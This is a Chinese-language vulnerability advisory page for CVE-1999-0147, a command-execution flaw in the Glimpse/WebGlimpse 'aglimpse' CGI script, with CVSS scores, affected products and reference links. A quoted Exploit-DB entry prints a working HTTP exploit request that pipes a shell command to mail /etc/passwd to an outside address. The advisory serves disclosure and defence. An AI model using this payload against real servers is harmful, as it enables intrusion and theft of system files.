CVE-1999-0147
CVSS7.5
发布时间 :1997-07-01 00:00:00
修订时间 :2008-09-09 08:33:50
NMCOE    

[原文]The aglimpse CGI program of the Glimpse package allows remote execution of arbitrary commands.


[CNNVD]Glimpse aglimpse CGI程序执行任意命令漏洞(CNNVD-199707-002)

        Glimpse数据包的aglimpse CGI程序存在漏洞。远程用户可以执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:university_of_arizona:webglimpse:1.5
cpe:/a:university_of_arizona:glimpse_http:2.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0147
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0147
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199707-002
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

Glimpse aglimpse CGI程序执行任意命令漏洞
高危 未知
1997-07-01 00:00:00 2006-11-16 00:00:00
远程  
        Glimpse数据包的aglimpse CGI程序存在漏洞。远程用户可以执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20449)

GlimpseHTTP 1.0/2.0 and WebGlimpse 1.0 Piped Command Vulnerability (EDBID:20449)
unix remote
1996-07-03 Verified
0 Razvan Dragomirescu
N/A [点击下载]
source: http://www.securityfocus.com/bid/2026/info

WebGlimpse and GlimpseHTTP are web indexing and search engine programs with some associated management scripts. GlimpseHTTP up to and including 2.0, and WebGlimpse prior to version 1.5, suffer from a common vulnerability involving the component "aglimpse". This script fails to filter the pipe metacharacter, allowing arbitrary command execution. The demonstration exploit for this vulnerability includes the unix shell "IFS" (Internal Field Separator) variable for situations where the web server filters space characters - by setting this to an acceptable character ("5" in the example exploit) it is possible to use commands with more than one field. (eg., "mail me@myhost.tld"). 

GET /cgi-bin/aglimpse|IFS=5;CMD=mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval5$CMD;echo 		

- 漏洞信息

82
Glimpse HTTP aglimpse Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

1997-07-02 Unknow
1997-07-02 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站